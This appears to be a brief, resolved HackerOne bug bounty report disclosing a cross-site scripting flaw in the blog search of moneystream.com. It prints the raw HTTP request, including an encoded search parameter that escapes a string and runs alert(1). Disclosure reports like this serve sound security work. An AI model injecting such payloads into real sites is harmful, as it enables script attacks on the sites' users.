Here is another XSS i got for you
Unknown
Vulnerability Details
I ve verified it and it does trigger a JS alert
POST /blog/ HTTP/1.1
Host: moneystream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://moneystream.com/blog/
Cookie: TrackingId=d86722a7-b3fc-45a4-87c8-fac0a31cca27
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
s=Search%2bthis%2bwebsite%252671879%3balert(1)%2f%2f593
Actions
View on HackerOneReport Stats
- Report ID: 4276
- State: Closed
- Substate: resolved
- Upvotes: 6